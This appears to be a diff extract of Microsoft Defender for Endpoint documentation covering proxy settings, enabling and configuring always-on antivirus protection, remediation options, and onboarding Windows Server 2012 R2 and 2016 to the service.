-2. Enter the following command and press **Enter**:
-
- ```cmd
- netsh winhttp set proxy <proxy>:<port>
- ```
-
- For example: `netsh winhttp set proxy 10.0.0.6:8080`
-
-To reset the winhttp proxy, enter the following command and press **Enter**:
-
-```cmd
-netsh winhttp reset proxy
-```
-
-See [Netsh Command Syntax, Contexts, and Formatting](/windows-server/networking/technologies/netsh/netsh-contexts) to learn more.
-
-## Next step
-
-[STEP 3: Verify client connectivity to Microsoft Defender for Endpoint service URLs](verify-connectivity.md)
--
-## Related articles
--- [Disconnected environments, proxies and Microsoft Defender for Endpoint](https://techcommunity.microsoft.com/t5/microsoft-defender-for-endpoint/disconnected-environments-proxies-and-microsoft-defender-for/ba-p/3710502)-- [Use Group Policy settings to configure and manage Microsoft Defender Antivirus](use-group-policy-microsoft-defender-antivirus.md)-- [Onboard Windows devices](configure-endpoints.md)-- [Troubleshoot Microsoft Defender for Endpoint onboarding issues](troubleshoot-onboarding.md)-- [Onboard devices without Internet access to Microsoft Defender for Endpoint](onboard-offline-machines.md)-
security Configure Real Time Protection Microsoft Defender Antivirus https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/configure-real-time-protection-microsoft-defender-antivirus.md
- Title: Enable and configure Microsoft Defender Antivirus always-on protection
-description: Enable and configure Microsoft Defender Antivirus real-time protection features such as behavior monitoring, heuristics, and machine learning.
----- Previously updated : 04/03/2024----- m365-security-- tier2-- mde-ngp--
-# Enable and configure Microsoft Defender Antivirus always-on protection
-
-**Applies to:**
--- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- Microsoft Defender Antivirus-
-**Platforms**
-- Windows-
-Always-on protection consists of real-time protection, behavior monitoring, and heuristics to identify malware based on known suspicious and malicious activities. These activities include events, such as processes making unusual changes to existing files, modifying or creating automatic startup registry keys and startup locations (also known as autostart extensibility points, or ASEPs), and other changes to the file system or file structure. Always-on protection is an important part of your antivirus protection and should be enabled.
-
-> [!NOTE]
-> [Tamper protection](prevent-changes-to-security-settings-with-tamper-protection.md) helps keep always-on protection and other security settings from being changed. As a result, when tamper protection is enabled, any changes made to [tamper-protected settings](/microsoft-365/security/defender-endpoint/prevent-changes-to-security-settings-with-tamper-protection#what-happens-when-tamper-protection-is-turned-on) are ignored. If you must make changes to a device and those changes are blocked by tamper protection, we recommend using [troubleshooting mode](/microsoft-365/security/defender-endpoint/enable-troubleshooting-mode) to temporarily disable tamper protection on the device. Note that after troubleshooting mode ends, any changes made to tamper-protected settings are reverted to their configured state.
-
-## Manage antivirus settings with Microsoft Intune
-
-You can use Intune to configure antivirus policies, and then apply those policies across devices in your organization. Antivirus policies help security admins focus on managing the discrete group of antivirus settings for managed devices. Each antivirus policy includes several profiles. Each profile contains only the settings that are relevant for Microsoft Defender Antivirus for macOS and Windows devices, or for the user experience in the Windows Security app on Windows devices. For more information, see [Antivirus policy for endpoint security in Intune](/mem/intune/protect/endpoint-security-antivirus-policy).
-
-1. Go to the [Intune admin center](https://intune.microsoft.com/) and sign in.
-
-2. In the navigation pane, choose **Endpoint security** and then, under **Manage**, choose **Antivirus**.
-
-3. Select an existing policy, or choose **+ Create Policy** to create a new policy.
-
- | Task | What to do |
- |||
- | Create a new policy for Windows devices | 1. In the **Create a profile** step, in the **Platform** list, select **Windows 10, Windows 11, and Windows Server**. For **Profile**, select **Microsoft Defender Antivirus**. Then choose **Create**.<br/><br/>2. On the **Basics** step, type a name and description for your policy, and then choose **Next**.<br/><br/>3. On the **Configuration settings** step, expand **Defender**, select the settings you want to use for your policy, and then choose **Next**. To get help with your settings, refer to [Policy CSP - Defender](/windows/client-management/mdm/policy-csp-defender?WT.mc_id=Portal-fx). <br/><br/>4. On the **Scope tags** step, choose **Select scope tags** to open the *Select tags* pane to assign scope tags to the profile, and then select **Next** to continue.<br/><br/>5. On the **Assignments** page, select the groups to receive this profile, and then select **Next**. For more information on assigning profiles, see [Assign user and device profiles](/mem/intune/configuration/device-profile-assign).<br/><br/>6. On the **Review + create** page, when you're done, choose **Create**. The new profile is displayed in the list when you select the policy type for the profile you created. |
- | Create a new policy for macOS devices | 1. In the **Create a profile** step, in the **Platform** list, select **macOS**. For **Profile**, select **Antivirus**. Then choose **Create**.<br/><br/>2. On the **Basics** step, type a name and description for your policy, and then choose **Next**.<br/><br/>3. On the **Configuration settings** step, select the settings you want to use for your policy, and then choose **Next**. To get help with your settings, refer to [Set preferences for Microsoft Defender for Endpoint on macOS](mac-preferences.md).<br/><br/>4. On the **Scope tags** step, choose **Select scope tags** to open the *Select tags* pane to assign scope tags to the profile, and then select **Next** to continue.<br/><br/>5. On the **Assignments** page, select the groups to receive this profile, and then select **Next**. For more information on assigning profiles, see [Assign user and device profiles](/mem/intune/configuration/device-profile-assign).<br/><br/>6. On the **Review + create** page, when you're done, choose **Create**. The new profile is displayed in the list when you select the policy type for the profile you created. |
- | Edit an existing policy for Windows devices | 1. Select an antivirus policy for Windows devices. <br/><br/>2. Next to **Configuration settings**, choose **Edit**. <br/><br/>3. Expand **Defender**, and then edit settings for your policy. To get help with your settings, refer to [Policy CSP - Defender](/windows/client-management/mdm/policy-csp-defender?WT.mc_id=Portal-fx). <br/><br/>4. select **Review + save**, and then select **Save**. |
- | Edit an existing policy for macOS devices | 1. Select an antivirus policy for macOS devices. <br/><br/>2. Select **Properties**, and then, next to **Configuration settings**, choose **Edit**. <br/><br/>3. Under **Microsoft Defender for Endpoint**, edit settings for your policy. To get help with your settings, refer to [Set preferences for Microsoft Defender for Endpoint on macOS](mac-preferences.md).<br/><br/>4. select **Review + save**, and then select **Save**. |
-
-## Are you using Group Policy?
-
-> [!IMPORTANT]
-> We recommend using [Microsoft Intune](/mem/intune/fundamentals/what-is-intune) to manage Microsoft Defender Antivirus settings for your organization. With Intune, you can control where tamper protection is enabled (or disabled) through policies. You can also protect Microsoft Defender Antivirus exclusions. For more information, see [Protect Microsoft Defender Antivirus exclusions from tampering](prevent-changes-to-security-settings-with-tamper-protection.md#protect-microsoft-defender-antivirus-exclusions).
-
-You can use Group Policy to manage some Microsoft Defender Antivirus settings. If [tamper protection](prevent-changes-to-security-settings-with-tamper-protection.md) is enabled in your organization, any changes made to [tamper-protected settings](/microsoft-365/security/defender-endpoint/prevent-changes-to-security-settings-with-tamper-protection#what-happens-when-tamper-protection-is-turned-on) are ignored. You can't turn off tamper protection by using Group Policy.
-
-If you must make changes to a device and those changes are blocked by tamper protection, we recommend using [troubleshooting mode](/microsoft-365/security/defender-endpoint/enable-troubleshooting-mode) to temporarily disable tamper protection on the device. After troubleshooting mode ends, any changes made to tamper-protected settings are reverted to their configured state.
-
-You can use **Local Group Policy Editor** to enable and configure Microsoft Defender Antivirus always-on protection settings.
-
-### Enable and configure always-on protection using Group Policy
-
-1. Open **Local Group Policy Editor**, as follows:
-
- 1. In your Windows 10 or Windows 11 taskbar search box, type **gpedit**.
-
- 2. Under **Best match**, select **Edit group policy** to launch **Local Group Policy Editor**.
-
- :::image type="content" source="media/gpedit-search.png" alt-text="The GPEdit taskbar search result in the Control panel" lightbox="media/gpedit-search.png":::
-
-2. In the left pane of **Local Group Policy Editor**, expand the tree to **Computer Configuration** \> **Administrative Templates** \> **Windows Components** \> **Microsoft Defender Antivirus**.
-
-3. Configure the Microsoft Defender Antivirus antimalware service policy setting.
-
- In the **Microsoft Defender Antivirus** details pane on right, double-click **Allow antimalware service to start up with normal priority**, and set it to **Enabled**.
-
- Then select **OK**.
-
-4. Configure the Microsoft Defender Antivirus real-time protection policy settings, as follows:
-
- 1. In the **Microsoft Defender Antivirus** details pane, double-click **Real-time Protection**. Or, from the **Microsoft Defender Antivirus** tree on left pane, select **Real-time Protection**.
-
- 2. In the **Real-time Protection** details pane on right, double-click the policy setting as specified in [Real-time protection policy settings](#real-time-protection-policy-settings) (later in this article).
-
- 3. Configure the setting as appropriate, and select **OK**.
-
- 4. Repeat the previous steps for each setting in the table.
-
-5. Configure the Microsoft Defender Antivirus scanning policy setting, as follows:
-
- 1. From the **Microsoft Defender Antivirus** tree on left pane, select **Scan**.
-
- 2. In the **Scan** details pane on right, double-click **Turn on heuristics**, and set it to **Enabled**.
-
- 3. Select **OK**.
-
-6. Close **Local Group Policy Editor**.
-
-### Real-time protection policy settings
-
-For the most current settings, get the latest ADMX files in your central store. See [How to create and manage the Central Store for Group Policy Administrative Templates in Windows](/troubleshoot/windows-client/group-policy/create-and-manage-central-store) and download the latest files.
-
-### Disable real-time protection in Group Policy
-
-> [!WARNING]
-> **Disabling real-time protection drastically reduces the protection on your endpoints and is not recommended**. In addition, if [tamper protection](prevent-changes-to-security-settings-with-tamper-protection.md) is enabled, you cannot turn it off by using Group Policy. If you must make changes to a device and those changes are blocked by tamper protection, we recommend using [troubleshooting mode](/microsoft-365/security/defender-endpoint/enable-troubleshooting-mode) to temporarily disable tamper protection on the device. Note that after troubleshooting mode ends, any changes made to tamper-protected settings are reverted to their configured state.
-
-1. Open **Local Group Policy Editor**.
-
- 1. In your Windows 10 or Windows 11 taskbar search box, type `gpedit`.
-
- 2. Under **Best match**, select **Edit group policy** to launch **Local Group Policy Editor**.
-
-2. In the left pane of **Local Group Policy Editor**, expand the tree to **Computer Configuration** \> **Administrative Templates** \> **Windows Components** \> **Microsoft Defender Antivirus** \> **Real-time Protection**.
-
-3. In the **Real-time Protection** details pane on right, double-click **Turn off real-time protection**.
-
-4. In the **Turn off real-time protection** setting window, set the option to **Enabled**.
-
-5. select **OK**.
-
-6. Close **Local Group Policy Editor**.
-
-## See also
--- [Configure behavioral, heuristic, and real-time protection](configure-protection-features-microsoft-defender-antivirus.md)-- [Microsoft Defender Antivirus in Windows 10](microsoft-defender-antivirus-in-windows-10.md)-
-If you're looking for antivirus-related information for other platforms, see:
-- [Set preferences for Microsoft Defender for Endpoint on macOS](mac-preferences.md)-- [Microsoft Defender for Endpoint on Mac](microsoft-defender-endpoint-mac.md)-- [macOS Antivirus policy settings for Microsoft Defender Antivirus for Intune](/mem/intune/protect/antivirus-microsoft-defender-settings-macos)-- [Set preferences for Microsoft Defender for Endpoint on Linux](linux-preferences.md)-- [Microsoft Defender for Endpoint on Linux](microsoft-defender-endpoint-linux.md)-- [Configure Defender for Endpoint on Android features](android-configure.md)-- [Configure Microsoft Defender for Endpoint on iOS features](ios-configure-features.md)-
security Configure Remediation Microsoft Defender Antivirus https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/configure-remediation-microsoft-defender-antivirus.md
- Title: Configure remediation for Microsoft Defender Antivirus detections
-description: Configure what Microsoft Defender Antivirus should do when it detects a threat, and how long quarantined files should be retained in the quarantine folder
------ Previously updated : 09/15/2023----- m365-security-- tier2-- mde-ngp--
-# Configure remediation for Microsoft Defender Antivirus detections
--
-**Applies to:**
--- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- Microsoft Defender Antivirus-
-**Platforms**
-- Windows-
-When Microsoft Defender Antivirus runs a scan, it attempts to remediate or remove threats that are detected. Remediation actions can include removing a file, sending it to quarantine, or allowing it to remain. This article includes information and links to resources about specifying what actions should be taken when threats are detected on devices. You can choose from several methods, such as:
--- [Microsoft Intune](#configure-remediation-options-using-intune)-- [Microsoft Configuration Manager](#configure-remediation-options-using-configuration-manager)-- [Group Policy](#configure-remediation-options-using-group-policy)-- [PowerShell or Windows Management Instrumentation (WMI)](#configure-remediation-options-using-powershell-or-wmi)-
-> [!IMPORTANT]
-> Microsoft Defender Antivirus detects and remediates files based on many factors. Sometimes, completing a remediation requires a reboot. Even if the detection is later determined to be a false positive, the reboot must be completed to ensure all additional remediation steps have been completed.
->
-> If you are certain Microsoft Defender Antivirus quarantined a file based on a false positive, you can restore the file from quarantine after the device reboots. See [Restore quarantined files in Microsoft Defender Antivirus](restore-quarantined-files-microsoft-defender-antivirus.md). To avoid this problem in the future, you can exclude files from the scans. See [Configure and validate exclusions for Microsoft Defender Antivirus scans](configure-exclusions-microsoft-defender-antivirus.md).
-
-Also see [Configure remediation-required scheduled full Microsoft Defender Antivirus scans](scheduled-catch-up-scans-microsoft-defender-antivirus.md#remed) for more remediation-related settings.
-
-## Configure remediation options using Intune
-
-1. As a global or security administrator, go to the [Intune admin center](https://intune.microsoft.com/) and sign in.
-
-2. Under **Manage**, choose **Antivirus**.
-
-3. Either create a new policy, or edit an existing policy using the following settings:
-
- - Platform: **Windows 10, Windows 11, and Windows Server**
- - Profile: **Microsoft Defender Antivirus**
-
-4. For configuration settings, expand **Defender**, scroll down to **Allow On Access Protection**. and set it to **Allowed**.
-
-5. Under **Allow On Access Protection**, select a remediation action for each level:
-
- - High severity threats
- - Severe threats
- - Moderate severity threats
- - Low severity threats
-
-6. Specify the device groups that should receive this policy (such as **All Devices**).
-
-7. Review your settings, and then choose **Save**.
-
-For more information about antivirus policies in Intune, see [Antivirus policy for endpoint security in Intune](/mem/intune/protect/endpoint-security-antivirus-policy).
-
-## Configure remediation options using Configuration Manager
-
-If you're using Configuration Manager, see the following articles:
--- [Configure Endpoint Protection in Configuration Manager](/mem/configmgr/protect/deploy-use/endpoint-protection-configure)-- [Default Actions Settings](/mem/configmgr/protect/deploy-use/endpoint-antimalware-policies#default-actions-settings)-
-## Configure remediation options using Group Policy
-
-1. On your Group Policy management computer, open the [Group Policy Management Console](/previous-versions/windows/it-pro/windows-server-2008-R2-and-2008/cc731212(v=ws.11)), and edit the Group Policy Object you want to configure.
-
-2. In the **Group Policy Management Editor**, go to **Computer configuration** and then select **Administrative templates**.
-
-3. Expand the tree to **Windows components** \> **Microsoft Defender Antivirus**.
-
-4. Using the following table, edit the policy as needed.
-
- |Setting|Description|Default setting (if not configured)|
- ||||
- |Scan <br/>Create a system restore point.|A system restore point is created each day before cleaning or scanning is attempted. |Disabled|
- |Scan<br/>Turn on removal of items from scan history folder.|Specify how many days items should be kept in the scan history.|30 days|
- |Root<br/>Turn off routine remediation.|Specify whether Microsoft Defender Antivirus automatically remediates threats, or whether to prompt the user.|Disabled. Threats are remediated automatically.|
- |Quarantine<br/>Configure removal of items from Quarantine folder.|Specify how many days items should be kept in quarantine before being removed.|90 days|
- |Threats<br/>Specify threat alert levels at which default action shouldn't be taken when detected.|Every threat that is detected by Microsoft Defender Antivirus is assigned a threat level (low, medium, high, or severe). You can use this setting to define how all threats for each of the threat levels should be remediated (quarantined, removed, or ignored). |Not applicable|
- |Threats<br/>Specify threats upon which default action shouldn't be taken when detected.|Specify how specific threats (using their threat ID) should be remediated. You can specify whether the specific threat should be quarantined, removed, or ignored.|Not applicable|
-
-5. Select **OK**.
-
-## Configure remediation options using PowerShell or WMI
-
-You can also use the [`Set-MpPreference` PowerShell cmdlet](/powershell/module/defender/set-mppreference) or [`MSFT_MpPreference` WMI class](/previous-versions/windows/desktop/defender/windows-defender-wmiv2-apis-portal) to configure these settings.
-
-## See also
--- [Microsoft Defender for Endpoint on Mac](microsoft-defender-endpoint-mac.md)-- [Microsoft Defender for Endpoint on Linux](microsoft-defender-endpoint-linux.md)-- [Configure Defender for Endpoint on Android features](android-configure.md)-- [Configure Microsoft Defender for Endpoint on iOS features](ios-configure-features.md)-
security Configure Server Endpoints https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/configure-server-endpoints.md
- Title: Onboard Windows servers to the Microsoft Defender for Endpoint service
-description: Onboard Windows servers so that they can send sensor data to the Microsoft Defender for Endpoint sensor.
--- Previously updated : 07/12/2023---- m365-security-- tier2----
-# Onboard Windows servers to the Microsoft Defender for Endpoint service
--
-**Applies to:**
--- Windows Server 2012 R2-- Windows Server 2016-- Windows Server Semi-Annual Enterprise Channel-- Windows Server 2019 and later-- Windows Server 2019 core edition-- Windows Server 2022-- [Microsoft Defender for Endpoint](https://go.microsoft.com/fwlink/p/?linkid=2154037)-
-> Want to experience Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-configserver-abovefoldlink)
-
-Defender for Endpoint extends support to also include the Windows Server operating system. This support provides advanced attack detection and investigation capabilities seamlessly through the Microsoft Defender XDR console. Support for Windows Server provides deeper insight into server activities, coverage for kernel and memory attack detection, and enables response actions.
-
-This article describes how to onboard specific Windows servers to Microsoft Defender for Endpoint.
-
-For guidance on how to download and use Windows Security Baselines for Windows servers, see [Windows Security Baselines](/windows/device-security/windows-security-baselines).
-
-## Windows Server onboarding overview
-
-You'll need to complete the following general steps to successfully onboard servers.
--
-> [!NOTE]
-> Windows Hyper-V Server editions are not supported.
-
-**Integration with Microsoft Defender for Servers**:
-
-Microsoft Defender for Endpoint integrates seamlessly with Microsoft Defender for Servers. You can onboard servers automatically, have servers monitored by Microsoft Defender for Cloud appear in Defender for Endpoint, and conduct detailed investigations as a Microsoft Defender for Cloud customer. For more information please go to [Protect your endpoints with Defender for Cloud's integrated EDR solution: Microsoft Defender for Endpoint](/azure/defender-for-cloud/integration-defender-for-endpoint?tabs=windows)
-
-> [!NOTE]
-> For Windows Server 2012 R2 and 2016, you can either manually install/upgrade the modern, unified solution on these machines, or use the integration to automatically deploy or upgrade servers covered by your respective Microsoft Defender for Server plan. More information about making the switch at [Protect your endpoints with Defender for Cloud's integrated EDR solution: Microsoft Defender for Endpoint](/azure/defender-for-cloud/integration-defender-for-endpoint?tabs=windows#enable-the-integration).
->
-> - When you use Microsoft Defender for Cloud to monitor servers, a Defender for Endpoint tenant is automatically created (in the US for US users, in the EU for European users, and in the UK for UK users).
-Data collected by Defender for Endpoint is stored in the geo-location of the tenant as identified during provisioning.
-> - If you use Defender for Endpoint before using Microsoft Defender for Cloud, your data will be stored in the location you specified when you created your tenant even if you integrate with Microsoft Defender for Cloud at a later time.
-> - Once configured, you cannot change the location where your data is stored. If you need to move your data to another location, you need to contact Microsoft Support to reset the tenant.
-> - Server endpoint monitoring utilizing this integration has been disabled for Office 365 GCC customers.
-> - Previously, the use of the Microsoft Monitoring Agent (MMA) on Windows Server 2016 and previous versions of Windows Server allowed for the OMS / Log Analytics gateway to provide connectivity to Defender cloud services. The new solution, like Microsoft Defender for Endpoint on Windows Server 2019, Windows Server 2022, and Windows 10, doesn't support this gateway.
-> - Linux servers onboarded through Microsoft Defender for Cloud will have their initial configuration set to run Defender Antivirus in [passive mode](microsoft-defender-antivirus-compatibility.md#microsoft-defender-antivirus-and-non-microsoft-antivirusantimalware-solutions).
-
-**Windows Server 2012 R2 and Windows Server 2016**:
--- Download installation and onboarding packages-- Apply the installation package-- Follow the onboarding steps for the corresponding tool-
-**Windows Server Semi-Annual Enterprise Channel and Windows Server 2019**:
--- Download the onboarding package-- Follow the onboarding steps for the corresponding tool-
-## Windows Server 2012 R2 and Windows Server 2016
-
-### New Windows Server 2012 R2 and 2016 functionality in the modern unified solution
-
-The previous implementation (before April of 2022) of onboarding Windows Server 2012 R2 and Windows Server 2016 required the use of Microsoft Monitoring Agent (MMA).
-
-The new unified solution package makes it easier to onboard servers by removing dependencies and installation steps. It also provides a much expanded feature set. For more information, please refer to [Defending Windows Server 2012 R2 and 2016](https://techcommunity.microsoft.com/t5/microsoft-defender-for-endpoint/defending-windows-server-2012-r2-and-2016/ba-p/2783292).
-
-Depending on the server that you're onboarding, the unified solution installs Microsoft Defender Antivirus and/or the EDR sensor. The following table indicates what component is installed and what is built in by default.
-
-|Server version|AV|EDR|
-|-|-|-|
-|Windows Server 2012 R2|![Yes.](media/svg/check-yes.svg)|![Yes.](media/svg/check-yes.svg)|
-|Windows Server 2016|Built-in|![Yes.](media/svg/check-yes.svg)|
-|Windows Server 2019 or later|Built-in|Built-in|
-
-If you've previously onboarded your servers using MMA, follow the guidance provided in [Server migration](server-migration.md) to migrate to the new solution.
-
-> [!IMPORTANT]
-> Before proceeding with onboarding, see the section [Known issues and limitations in the new, unified solution package for Windows Server 2012 R2 and 2016](#known-issues-and-limitations-in-the-new-unified-solution-package-for-windows-server-2012-r2-and-2016).
-
-### Prerequisites
-
-#### Prerequisites for Windows Server 2012 R2
-
-If you've fully updated your machines with the latest [monthly rollup](https://support.microsoft.com/topic/windows-8-1-and-windows-server-2012-r2-update-history-47d81dd2-6804-b6ae-4112-20089467c7a6) package, there are **no** other prerequisites and the below requirements will already be filled.
-
-The installer package will check if the following components have already been installed via an update to assess if minimum requirements have been met for a successful installation:
--- [Update for customer experience and diagnostic telemetry](https://support.microsoft.com/help/3080149/update-for-customer-experience-and-diagnostic-telemetry)-- [Update for Universal C Runtime in Windows](https://support.microsoft.com/topic/update-for-universal-c-runtime-in-windows-c0514201-7fe6-95a3-b0a5-287930f3560c)-- [Security Update for Windows Server 2012 R2 (KB3045999)](https://support.microsoft.com/topic/ms15-038-description-of-the-security-update-for-windows-april-14-2015-99265f07-6926-d6d2-5203-3b32b214a9c3)-
-#### Prerequisites for Windows Server 2016
-
-It's recommended to install the latest available SSU and LCU on the server.
--- The Servicing Stack Update (SSU) from September 14, 2021 or later must be installed.-- The Latest Cumulative Update (LCU) from September 20, 2018 or later must be installed. -- Enable the Microsoft Defender Antivirus feature and ensure it's up to date. For more information on enabling Defender Antivirus on Windows Server, see [Re-enable Defender Antivirus on Windows Server if it was disabled](enable-update-mdav-to-latest-ws.md#re-enable-microsoft-defender-antivirus-on-windows-server-if-it-was-disabled) and [Re-enable Defender Antivirus on Windows Server if it was uninstalled](enable-update-mdav-to-latest-ws.md#re-enable-microsoft-defender-antivirus-on-windows-server-if-it-was-uninstalled).-- Download and install the latest platform version using Windows Update. Alternatively, download the update package manually from the [Microsoft Update Catalog](https://www.catalog.update.microsoft.com/Search.aspx?q=KB4052623) or from [MMPC](https://go.microsoft.com/fwlink/?linkid=870379&arch=x64).-
-#### Prerequisites for running with third-party security solutions
-
-If you intend to use a third-party anti-malware solution, you'll need to run Microsoft Defender Antivirus in passive mode. You must remember to set to passive mode during the installation and onboarding process.
-
-> [!NOTE]
-> If you're installing Microsoft Defender for Endpoint on Servers with McAfee Endpoint Security (ENS) or VirusScan Enterprise (VSE), the version of the McAfee platform may need to be updated to ensure Microsoft Defender Antivirus is not removed or disabled. For more information including the specific version numbers required, see, [McAfee Knowledge Center article](https://kcm.trellix.com/corporate/index?page=content&id=KB88214).
-
-#### Update packages for Microsoft Defender for Endpoint on Windows Server 2012 R2 and 2016
-
-To receive regular product improvements and fixes for the EDR Sensor component, ensure Windows Update [KB5005292](https://go.microsoft.com/fwlink/?linkid=2168277) gets applied or approved. In addition, to keep protection components updated, see [Manage Microsoft Defender Antivirus updates and apply baselines](/microsoft-365/security/defender-endpoint/manage-updates-baselines-microsoft-defender-antivirus#monthly-platform-and-engine-versions).
-
-If you're using Windows Server Update Services (WSUS) and/or Microsoft Endpoint Configuration Manager, this new "Microsoft Defender for Endpoint update for EDR Sensor" is available under the category "Microsoft Defender for Endpoint".
-
-### Onboarding steps summary
--- STEP 1: [Download the installation and onboarding packages](#step-1-download-installation-and-onboarding-packages)-- STEP 2: [Apply the installation and onboarding package](#step-2-apply-the-installation-and-onboarding-package)-- STEP 3: [Complete the onboarding steps](#step-3-complete-the-onboarding-steps)-
-### STEP 1: Download installation and onboarding packages
-
-You'll need to download both the **installation** and **onboarding** packages from the portal.
-
-> [!NOTE]
-> The installation package is updated monthly. Be sure to download the latest package before usage.
-> To update after installation, you do not have to run the installer package again. If you do, the installer will ask you to offboard first as that is a requirement for uninstallation. See [Update packages for Microsoft Defender for Endpoint on Windows Server 2012 R2 and 2016](#update-packages-for-microsoft-defender-for-endpoint-on-windows-server-2012-r2-and-2016).
--
-> [!NOTE]
-> On Windows Server 2012R2, Microsoft Defender Antivirus will get installed by the installation package and will be active unless you set it to passive mode. On Windows Server 2016, Microsoft Defender Antivirus must be installed as a feature (see [Switch to MDE](/microsoft-365/security/defender-endpoint/switch-to-mde-phase-2#re-enable-microsoft-defender-antivirus-on-windows-server-2016)) first and fully updated before proceeding with the installation.
->
-> If you are running a non-Microsoft anti-malware solution ensure you add exclusions for Microsoft Defender Antivirus ([from this list of Microsoft Defender Processes on the Defender Processes tab](https://download.microsoft.com/download/6/b/f/6bfff670-47c3-4e45-b01b-64a2610eaefa/mde-urls-commercial.xlsx
-)) to the non-Microsoft solution before installation. It is also recommended to add non-Microsoft security solutions to the Defender Antivirus exclusion list.
-
-The **installation package** contains an MSI file that installs the Microsoft Defender for Endpoint agent.
-
-The **onboarding package** contains the following file:
--- `WindowsDefenderATPOnboardingScript.cmd` - contains the onboarding script-
-Follow these steps to download the packages:
-
-1. In Microsoft Defender XDR, go to **Settings > Endpoint > Onboarding**.
-
-2. Select **Windows Server 2012 R2 and 2016**.
-
-3. Select **Download installation package** and save the .msi file.
-
-4. Select **Download onboarding package** and save the .zip file.
-
-5. Install the installation package using any of the options to install Microsoft Defender Antivirus. The installation requires administrative permissions.
-
-> [!IMPORTANT]
->
-> A local onboarding script is suitable for a proof of concept but should not be used for production deployment. For a production deployment, we recommend using Group Policy, or Microsoft Endpoint Configuration Manager.
-
-### STEP 2: Apply the installation and onboarding package
-
-In this step, you'll install the prevention and detection components required before onboarding your device to the Microsoft Defender for Endpoint cloud environment, to prepare the machine for onboarding. Ensure all [prerequisites](#prerequisites) have been met.
-
-> [!NOTE]
-> Microsoft Defender Antivirus will get installed and will be active unless you set it to passive mode.
-
-#### Options to install the Microsoft Defender for Endpoint packages
-
-In the previous section, you downloaded an installation package. The installation package contains the installer for all Microsoft Defender for Endpoint components.
-
-You can use any of the following options to install the agent:
--- [Install using the command line](#install-microsoft-defender-for-endpoint-using-the-command-line)-- [Install using a script](#install-microsoft-defender-for-endpoint-using-a-script)-- [Apply the installation and onboarding packages using Group Policy](#apply-the-microsoft-defender-for-endpoint-installation-and-onboarding-packages-using-group-policy-when-performing-the-installation-with-an-installer-script)-
-##### Install Microsoft Defender For Endpoint using the command line
-
-Use the installation package from the previous step to install Microsoft Defender for Endpoint.
-
-Run the following command to install Microsoft Defender for Endpoint:
-
-```console
-Msiexec /i md4ws.msi /quiet
-```
-
-To uninstall, ensure the machine is offboarded first using the appropriate offboarding script. Then, use Control Panel \> Programs \> Programs and Features to perform the uninstall.
-
-Alternatively, run the following uninstall command to uninstall Microsoft Defender for Endpoint:
-
-```console
-Msiexec /x md4ws.msi /quiet
-```
-
-You must use the same package you used for installation for the above command to succeed.
-
-The `/quiet` switch suppresses all notifications.
-
-> [!NOTE]
-> Microsoft Defender Antivirus doesn't automatically go into passive mode. You can choose to set Microsoft Defender Antivirus to run in passive mode if you are running a non-Microsoft antivirus/antimalware solution. For command line installations, the optional `FORCEPASSIVEMODE=1` immediately sets the Microsoft Defender Antivirus component to Passive mode to avoid interference. Then, to ensure Defender Antivirus remains in passive mode after onboarding to support capabilities like EDR Block, set the "ForceDefenderPassiveMode" registry key.
-
-Support for Windows Server provides deeper insight into server activities, coverage for kernel and memory attack detection, and enables response actions.
-
-##### Install Microsoft Defender for Endpoint using a script
-
-You can use the [installer helper script](server-migration.md#installer-script) to help automate installation, uninstallation, and onboarding.
-
-> [!NOTE]
-> The installation script is signed. Any modifications to the script will invalidate the signature. When you download the script from GitHub, the recommended approach to avoid inadvertent modification is to download the source files as a zip archive then extract it to obtain the install.ps1 file (on the main Code page, click the Code dropdown menu and select "Download ZIP").
-
-This script can be used in various scenarios, including those scenarios described in [Server migration scenarios from the previous, MMA-based Microsoft Defender for Endpoint solution](/microsoft-365/security/defender-endpoint/server-migration) and for deployment using Group Policy as described below.
-
-## Apply the Microsoft Defender for Endpoint installation and onboarding packages using Group policy when performing the installation with an installer script
-
-1. Create a group policy: <br> Open the [Group Policy Management Console](/internet-explorer/ie11-deploy-guide/group-policy-and-group-policy-mgmt-console-ie11) (GPMC), right-click **Group Policy Objects** you want to configure and select **New**. Enter the name of the new GPO in the dialogue box that is displayed and select **OK**.
-
-2. Open the [Group Policy Management Console](/internet-explorer/ie11-deploy-guide/group-policy-and-group-policy-mgmt-console-ie11) (GPMC), right-click the Group Policy Object (GPO) you want to configure and select **Edit**.
-
-3. In the **Group Policy Management Editor**, go to **Computer configuration**, then **Preferences**, and then **Control panel settings**.
-
-4. Right-click **Scheduled tasks**, point to **New**, and then click **Immediate Task (At least Windows 7)**.
-
-5. In the **Task** window that opens, go to the **General** tab. Under **Security options** select **Change User or Group** and type SYSTEM and then select **Check Names** then **OK**. NT AUTHORITY\SYSTEM appears as the user account the task will run as.
-
-6. Select **Run whether user is logged on or not** and check the **Run with highest privileges** check box.
-
-7. In the Name field, type an appropriate name for the scheduled task (for example, Defender for Endpoint Deployment).
-
-8. Go to the **Actions** tab and select **New...** Ensure that **Start a program** is selected in the **Action** field. The [installer script](server-migration.md#installer-script) handles the installation, and immediately perform the onboarding step after installation completes. Select *C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe* then provide the arguments:
-
- ```powershell
- -ExecutionPolicy RemoteSigned \\servername-or-dfs-space\share-name\install.ps1 -OnboardingScript \\servername-or-dfs-space\share-name\windowsdefenderatponboardingscript.cmd
- ```
-
- > [!NOTE]
- > The recommended execution policy setting is `Allsigned`. This requires importing the script's signing certificate into the Local Computer Trusted Publishers store if the script is running as SYSTEM on the endpoint.
-
